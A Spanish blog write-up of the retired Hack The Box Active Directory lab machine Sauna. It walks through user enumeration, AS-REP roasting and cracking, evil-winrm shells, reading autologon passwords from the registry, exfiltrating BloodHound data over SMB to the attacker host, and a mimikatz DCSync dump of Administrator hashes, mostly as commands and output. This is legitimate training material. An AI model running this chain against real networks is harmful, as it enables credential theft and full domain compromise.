<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Maquina Retirada Sauna AD de Hack The Box (Necesario VIP) | Pirrandi Blog</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="Maquina Retirada Sauna AD de Hack The Box (Necesario VIP)" />
<meta name="author" content="Pirrandi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SAUNA AD" />
<meta property="og:description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SAUNA AD" />
<link rel="canonical" href="http://localhost:4000/2022/01/04/Sauna.html" />
<meta property="og:url" content="http://localhost:4000/2022/01/04/Sauna.html" />
<meta property="og:site_name" content="Pirrandi Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-01-04T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Maquina Retirada Sauna AD de Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Pirrandi"},"dateModified":"2022-01-04T00:00:00-03:00","datePublished":"2022-01-04T00:00:00-03:00","description":"En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SAUNA AD","headline":"Maquina Retirada Sauna AD de Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2022/01/04/Sauna.html"},"url":"http://localhost:4000/2022/01/04/Sauna.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Pirrandi Blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pirrandi Blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Este es mi blog personal sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">Maquina Retirada Sauna AD de Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/ASREP-Roast,/">ASREP-Roast,</a>
      
      <a class="tag" href="/tag/Kerbrute,/">Kerbrute,</a>
      
      <a class="tag" href="/tag/WinPeas,/">WinPeas,</a>
      
      <a class="tag" href="/tag/BloodHound,/">BloodHound,</a>
      
      <a class="tag" href="/tag/Neo4j,/">Neo4j,</a>
      
      <a class="tag" href="/tag/SharpHound.ps1,/">SharpHound.ps1,</a>
      
      <a class="tag" href="/tag/Mimikatz.exe,/">Mimikatz.exe,</a>
      
      <a class="tag" href="/tag/GetChanges-All,/">GetChanges-All,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Active/">Active</a>
      
      <a class="tag" href="/tag/Directory,/">Directory,</a>
      
  </div>
  
  <div class="post-date">Published on 04 Jan 2022</div>
  
  <noscript>
    <div class="post-description">En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SAUNA AD</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="sauna-ad--hack-the-box">Sauna AD ~ Hack The Box</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">$" nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allports 10.10.10.175       "</span>
</code></pre></div></div>
<p>Procedemos con el siguiente escaneo de Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos <span class="o">(</span>server <span class="nb">time</span>: 2022-01-02 00:47:13Z<span class="o">)</span>
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name<span class="o">)</span>
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m02s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   <span class="nb">date</span>: 2022-01-02T00:48:04
|_  start_date: N/A
</code></pre></div></div>
<p>Procedemos a enumerar el puerto 80 y ver que hay a nivel WEB para enumerar posibles Usuarios a nivel del Dominio encontrado <code class="language-plaintext highlighter-rouge">EGOTISTICAL-BANK.LOCAL</code> 
Introducimos el Dominio en nuestro archivo <code class="language-plaintext highlighter-rouge">/etc/hosts</code></p>

<p>Encontramos unos posibles usuarios Validos a nivel web, procedo a montarme un Diccionario para preoceder a realizar un ASREP-Roast Attack 
Para ello utilizaremos la herramienta <code class="language-plaintext highlighter-rouge">GetNPUsers.py</code> mas a delante.</p>

<p>Procedemos a montarnos un archivo con los Nombres de los Usuarios Encontrados</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat diccionario_users                                                                                                                                                                                      1 ⚙</span>
Fergus Smith
Shaun Coins
Bowie Taylor 
Sophie Driver
Steven Kerb
</code></pre></div></div>
<p>Ahora procedemos a hacer uso de la herramienta <code class="language-plaintext highlighter-rouge">Username-Anarchy</code> para crear distintas variaciones en los nombre de usuario a nivel del diccionario_users.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ./username-anarchy --input-file diccionario_users  --select-format first,flast,first.last,firstl</span>
fergus
fergus.smith
ferguss
fsmith
shaun
shaun.coins
shaunc
scoins
bowie
bowie.taylor
bowiet
btaylor
sophie
sophie.driver
sophied
sdriver
steven
steven.kerb
stevenk
skerb
</code></pre></div></div>
<p>Redirigimos el contenido de usuarios nuevos creados a el Archivo <code class="language-plaintext highlighter-rouge">diccionario_users.modifed</code></p>

<h1 id="asreproasting-attack">ASREPRoasting Attack</h1>

<p>Paso 1 - Tener un diccionario Creado con posibles Usuarios para realizar el ataque
Paso 2 - Realizar el Ataque con la siguiente estructura modificando el Dominio y Diccionario a usar</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># GetNPUsers.py egotistical-bank.local/ -no-pass -usersfile ../nmap/diccionario_users.modified      </span>
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation

<span class="o">[</span>-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN<span class="o">(</span>Client not found <span class="k">in </span>Kerberos database<span class="o">)</span>
<span class="o">[</span>-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN<span class="o">(</span>Client not found <span class="k">in </span>Kerberos database<span class="o">)</span>
<span class="o">[</span>-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN<span class="o">(</span>Client not found <span class="k">in </span>Kerberos database<span class="o">)</span>
<span class="nv">$krb5asrep$23$fsmith</span>@EGOTISTICAL-BANK.LOCAL:847325b2e10c33d2ae7b40c82a74ff56<span class="nv">$7f6c655697711e9b3e7d75f09a12d53e1b521549fd5704bf</span>
bdeb5fa321b54f2a115dee82fbc6d9dcd6526a31e44b5701a39574897418052dd9062a21db7aebe7ad0f5b63a05ef041053cfa2e03bc0caa058044cd2caf8
89023bcf1b3a0aa0f3eef4c6425f4e37f9e4d2d3fcbde5dfd462cc11bd19a168c81239e9dfafb0530b8c87321497389afcef5dc573142acef0b14a2b0a161
d182e665c760814e73e13a8a4cb8fc0fe61dc4c164a598d0adf5d95f616fe8c46dd5deae459f703e1c42392eefc9912258061dbd0676f054279cbbb1d457a
daf0a64b196f1f47249b3a6de3c43c15b6d734e888a884d4a9b5bcbbf533d6895403bbd692f69b59b743ea83c
<span class="o">[</span>-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN<span class="o">(</span>Client not found <span class="k">in </span>Kerberos database<span class="o">)</span>
<span class="o">[</span>-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN<span class="o">(</span>Client not found <span class="k">in </span>Kerberos database<span class="o">)</span>
<span class="nb">.</span>
-
</code></pre></div></div>

<p>Vemos que obtenemos un <code class="language-plaintext highlighter-rouge">HASH</code> que podemos proceder a Crackear conm la herramienta John</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># john --wordlist=/usr/share/wordlists/rockyou.txt hash</span>
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>krb5asrep, Kerberos 5 AS-REP etype 17/18/23 <span class="o">[</span>MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]<span class="o">)</span>
Will run 8 OpenMP threads
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
<span class="s2">"Thestrokes23"</span>     <span class="o">(</span><span class="nv">$krb5asrep$23</span><span class="s2">$"fsmith"</span>@EGOTISTICAL-BANK.LOCAL<span class="o">)</span>
1g 0:00:00:04 DONE <span class="o">(</span>2022-01-04 15:51<span class="o">)</span> 0.2232g/s 2352Kp/s 2352Kc/s 2352KC/s Tiffani143..Thehulk2008
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed
</code></pre></div></div>
<p>Obtenemos Credenciales</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fsmith: Thestrokes23
</code></pre></div></div>

<p>Procedemos a Validar con Crackmapexec el usuario y la password tanto para SMB como para WINRM</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23                   </span>
SMB         10.10.10.175    445    SAUNA            <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 10.0 Build 17763 x64 <span class="o">(</span>name:SAUNA<span class="o">)</span> <span class="o">(</span>domain:EGOTISTICAL-BANK.LOCAL<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span>
SMB         10.10.10.175    445    SAUNA            <span class="o">[</span>+] EGOTISTICAL-BANK.LOCAL<span class="se">\f</span>smith:Thestrokes23

<span class="c"># crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23</span>
WINRM       10.10.10.175    5985   SAUNA            <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 10.0 Build 17763 <span class="o">(</span>name:SAUNA<span class="o">)</span> <span class="o">(</span>domain:EGOTISTICAL-BANK.LOCAL<span class="o">)</span>
WINRM       10.10.10.175    5985   SAUNA            <span class="o">[</span><span class="k">*</span><span class="o">]</span> http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            <span class="o">[</span>+] EGOTISTICAL-BANK.LOCAL<span class="se">\f</span>smith:Thestrokes23 <span class="o">(</span>Pwn3d!<span class="o">)</span>
</code></pre></div></div>
<p>Procedemos a conectarnos como el usuario fsmith con la Herramienta Evil-winrm</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'                   </span>

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function </span>is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\F</span>Smith<span class="se">\D</span>ocuments&gt; <span class="nb">whoami 
</span>egotisticalbank<span class="se">\f</span>smith
</code></pre></div></div>
<p>Procedemos a enumerar Usuarios a nivel Local en la Maquina y los guardamos en un archivo.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\F</span>Smith<span class="se">\D</span>ocuments&gt; net <span class="nb">users

</span>User accounts <span class="k">for</span> <span class="se">\\</span>

<span class="nt">-------------------------------------------------------------------------------</span>
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
</code></pre></div></div>

<p>Procedemos a subir nuestro scrip winPEASx64.exe para realizar un reconocimiento
Encontramos las siguientes Credenciales para el usuario almacenadas por defecto en el AUTOLOGON:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>svc_loanmgr: Moneymakestheworldgoround!
</code></pre></div></div>
<h1 id="sacar-las-credenciales-almacenadas-en-el-autologon-windows">Sacar las credenciales Almacenadas en el Autologon Windows</h1>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\F</span>Smith<span class="se">\D</span>ocuments&gt; reg query <span class="s2">"HKLM</span><span class="se">\S</span><span class="s2">OFTWARE</span><span class="se">\M</span><span class="s2">icrosoft</span><span class="se">\W</span><span class="s2">indows NT</span><span class="se">\C</span><span class="s2">urrentversion</span><span class="se">\W</span><span class="s2">inlogon"</span>

HKEY_LOCAL_MACHINE<span class="se">\S</span>OFTWARE<span class="se">\M</span>icrosoft<span class="se">\W</span>indows NT<span class="se">\C</span>urrentversion<span class="se">\W</span>inlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK<span class="se">\s</span>vc_loanmanager
    .......etc... 
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!
</code></pre></div></div>

<p>Procedemos a Validar las Credenciales para el user svc_loanmgr con Crackmapexec</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># crackmapexec smb 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!' </span>
SMB         10.10.10.175    445    SAUNA            <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 10.0 Build 17763 x64 <span class="o">(</span>name:SAUNA<span class="o">)</span> <span class="o">(</span>domain:EGOTISTICAL-BANK.LOCAL<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span>
SMB         10.10.10.175    445    SAUNA            <span class="o">[</span>+] EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:Moneymakestheworldgoround!

<span class="c"># crackmapexec winrm 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!' </span>
WINRM       10.10.10.175    5985   SAUNA            <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 10.0 Build 17763 <span class="o">(</span>name:SAUNA<span class="o">)</span> <span class="o">(</span>domain:EGOTISTICAL-BANK.LOCAL<span class="o">)</span>
WINRM       10.10.10.175    5985   SAUNA            <span class="o">[</span><span class="k">*</span><span class="o">]</span> http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            <span class="o">[</span>+] EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:Moneymakestheworldgoround! <span class="o">(</span>Pwn3d!<span class="o">)</span>
</code></pre></div></div>

<p>Vemos que Tambien tenemos acceso para conectarnos con la Herramienta Evil-winrm al user <code class="language-plaintext highlighter-rouge">svc_loanmgr</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'      </span>

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function </span>is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\s</span>vc_loanmgr<span class="se">\D</span>ocuments&gt; <span class="nb">whoami
</span>egotisticalbank<span class="se">\s</span>vc_loanmgr
</code></pre></div></div>

<h1 id="haciendo-uso-de-sharphoundps1">Haciendo Uso de SharpHound.ps1</h1>
<p>Procedemos a enumerar el sistema a nivel de Active Directory con la herramienta SharpHound.ps1
Nos descargamos SharpHound.ps1 haciendo un wget a –&gt; https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1
Grepeando por la funcion</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># grep "Invoke-BloodHound" SharpHound.ps1</span>
<span class="k">function </span>Invoke-BloodHound<span class="o">{</span>
        PS C:<span class="se">\&gt;</span> Invoke-BloodHound <span class="nt">-Loop</span> <span class="nt">-LoopInterval</span> 00:01:00 <span class="nt">-LoopDuration</span> 00:10:00
  <span class="s2">"     PS C:</span><span class="se">\&gt;</span><span class="s2"> Invoke-BloodHound -CollectionMethod All "</span>     <span class="nt">---</span><span class="o">&gt;</span> esta es la que usaremos
        PS C:<span class="se">\&gt;</span> Invoke-BloodHound <span class="nt">-CollectionMethod</span> DCOnly <span class="nt">-NoSaveCache</span> <span class="nt">-RandomizeFilenames</span> <span class="nt">-EncryptZip</span>
</code></pre></div></div>

<p>Procedemos a subirlo a la maquina victima a la siguiente ruta <code class="language-plaintext highlighter-rouge">C://Windows/Temp/Privesc/</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\s</span>vc_loanmgr<span class="se">\D</span>ocuments&gt; <span class="nb">cd </span>C://Windows/Temp/Privesc
<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc<span class="se">\S</span>harpHound.ps1

Progress: 43% : |▓▓▓▒░░░░░░

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; <span class="nb">dir
    </span>Directory: C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc

Mode                LastWriteTime         Length Name
<span class="nt">----</span>                <span class="nt">-------------</span>         <span class="nt">------</span> <span class="nt">----</span>
<span class="nt">-a----</span>         1/4/2022   2:13 PM         974235 SharpHound.ps1
</code></pre></div></div>
<p>Una vez subido Procedemos a hacer lo siguiente:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; Import-Module .<span class="se">\S</span>harpHound.ps1

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; Invoke-BloodHound <span class="nt">-CollectionMethod</span> All

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; <span class="nb">dir


    </span>Directory: C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc


Mode                LastWriteTime         Length Name
<span class="nt">----</span>                <span class="nt">-------------</span>         <span class="nt">------</span> <span class="nt">----</span>
<span class="nt">-a----</span>         1/4/2022   2:15 PM           9067 20220104141535_BloodHound.zip
<span class="nt">-a----</span>         1/4/2022   2:13 PM         974235 SharpHound.ps1
<span class="nt">-a----</span>         1/4/2022   2:15 PM          11122 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
</code></pre></div></div>
<p>Ahora procedemos a iniciar el servicio <code class="language-plaintext highlighter-rouge">neo4j console</code> en una terminal ~ Nos logueamos con nuestras Credenciales
Ahora procedemos a iniciar el servicio <code class="language-plaintext highlighter-rouge">BloodHound &amp;&gt;/dev/null &amp;</code> para subir el archivo <code class="language-plaintext highlighter-rouge">.zip</code> que acabamos de crear con la expresion anterior atraves del modulo SharpHound</p>

<p>Antes de subir el archivo al BloodHound sofware tenemos que pasarnoslo a nuestra maquina, para ello nos creamos un recurso compartido con <code class="language-plaintext highlighter-rouge">Impacket-smbserver</code> y nos sincronizamos 
con el recurso compartido que acabamos de crear desde la maquina victima:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; net use x: <span class="se">\\</span>10.10.16.7<span class="se">\s</span>mbFolder
The <span class="nb">command </span>completed successfully.
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># impacket-smbserver smbFolder $(pwd) -smb2support                                                                                                                                                           1 ⚙</span>
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Callback added <span class="k">for </span>UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Callback added <span class="k">for </span>UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Config file parsed
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Incoming connection <span class="o">(</span>10.10.10.175,49885<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> AUTHENTICATE_MESSAGE <span class="o">(</span><span class="se">\,</span>SAUNA<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> User SAUNA<span class="se">\ </span>authenticated successfully
<span class="o">[</span><span class="k">*</span><span class="o">]</span> :::00::aaaaaaaaaaaaaaaa
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Connecting Share<span class="o">(</span>1:IPC<span class="nv">$)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Connecting Share<span class="o">(</span>2:smbFolder<span class="o">)</span>
</code></pre></div></div>

<p>Una vez ya tenemos el Recurso x: o smbFolder seteado procedemos a pasarnos el archivo .zip</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; copy 20220104141535_BloodHound.zip x:<span class="se">\2</span>0220104141535_BloodHound.zip
</code></pre></div></div>
<p>Listo, Ya tendriamos nuestro archivo en nuestra maquina Atacante, preparado para subirlo al BloodHound.</p>

<h1 id="bloodhound---getchangesall---dcsynck-attack">BloodHound - GetChangesAll - DCSynck Attack</h1>
<p>Con el BloodHound Activo y chequeando por posibles formas de llegar al DC, pinchamos en la forma de realizar un 
DCSYnc Attack y enumeramos la siguiente informacion:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>El usuario <span class="sb">`</span>svc_loanmgr<span class="sb">`</span> tiene como privilegios <span class="sb">`</span>GetChanges-All<span class="sb">`</span> &amp; <span class="sb">`</span>GetChanges<span class="sb">`</span> sobre El dominio <span class="sb">`</span>Egotistical-bank.local<span class="sb">`</span>  
</code></pre></div></div>
<p>Pinchamos sobre como podemos abusar de esto y vemos una potencial forma de realizar con mimikatz.exe un DCSynck 
Procedemos a subir el archivito <code class="language-plaintext highlighter-rouge">mimikatz.exe</code> y realizar el DCSynck Attack:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt;<span class="s2">" C://Windows/Temp/Privesc/mimikatz.exe 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator' exit"</span>

  .#####.   mimikatz 2.2.0 <span class="o">(</span>x64<span class="o">)</span> <span class="c">#19041 Sep 18 2020 19:18:29</span>
 .## ^ <span class="c">##.  "A La Vie, A L'Amour" - (oe.eo)</span>
 <span class="c">## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span>
 <span class="c">## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz</span>
 <span class="s1">'## v ##'</span>       Vincent LE TOUX             <span class="o">(</span> vincent.letoux@gmail.com <span class="o">)</span>
  <span class="s1">'#####'</span>        <span class="o">&gt;</span> https://pingcastle.com / https://mysmartlogon.com <span class="k">***</span>/

mimikatz<span class="o">(</span>commandline<span class="o">)</span> <span class="c"># lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator</span>
<span class="o">[</span>DC] <span class="s1">'EGOTISTICAL-BANK.LOCAL'</span> will be the domain
<span class="o">[</span>DC] <span class="s1">'SAUNA.EGOTISTICAL-BANK.LOCAL'</span> will be the DC server
<span class="o">[</span>DC] <span class="s1">'Administrator'</span> will be the user account

Object RDN           : Administrator

<span class="k">**</span> SAM ACCOUNT <span class="k">**</span>

SAM Username         : <span class="s2">"Administrator"</span>
Account Type         : 30000000 <span class="o">(</span> USER_OBJECT <span class="o">)</span>
User Account Control : 00010200 <span class="o">(</span> NORMAL_ACCOUNT DONT_EXPIRE_PASSWD <span class="o">)</span>
Account expiration   :
Password last change : 7/26/2021 8:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
 <span class="s2">" Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e"</span>
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: 365ca60e4aba3e9a71d78a3912caf35c
    lm  - 1: 7af65ae5e7103761ae828523c7713031

Supplemental Credentials:
<span class="k">*</span> Primary:NTLM-Strong-NTOWF <span class="k">*</span>
    Random Value : 716dbadeed0e537580d5f8fb28780d44

<span class="k">*</span> Primary:Kerberos-Newer-Keys <span class="k">*</span>
    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       <span class="o">(</span>4096<span class="o">)</span> : 42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
      aes128_hmac       <span class="o">(</span>4096<span class="o">)</span> : a9f3769c592a8a231c3c972c4050be4e
      des_cbc_md5       <span class="o">(</span>4096<span class="o">)</span> : fb8f321c64cea87f
    OldCredentials
      aes256_hmac       <span class="o">(</span>4096<span class="o">)</span> : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
      aes128_hmac       <span class="o">(</span>4096<span class="o">)</span> : 145e4d0e4a6600b7ec0ece74997651d0
      des_cbc_md5       <span class="o">(</span>4096<span class="o">)</span> : 19d5f15d689b1ce5
    OlderCredentials
      aes256_hmac       <span class="o">(</span>4096<span class="o">)</span> : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef
      aes128_hmac       <span class="o">(</span>4096<span class="o">)</span> : 52c02b864f61f427d6ed0b22639849df
      des_cbc_md5       <span class="o">(</span>4096<span class="o">)</span> : d9379d13f7c15d1c

<span class="k">*</span> Primary:Kerberos <span class="k">*</span>
    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
    Credentials
      des_cbc_md5       : fb8f321c64cea87f
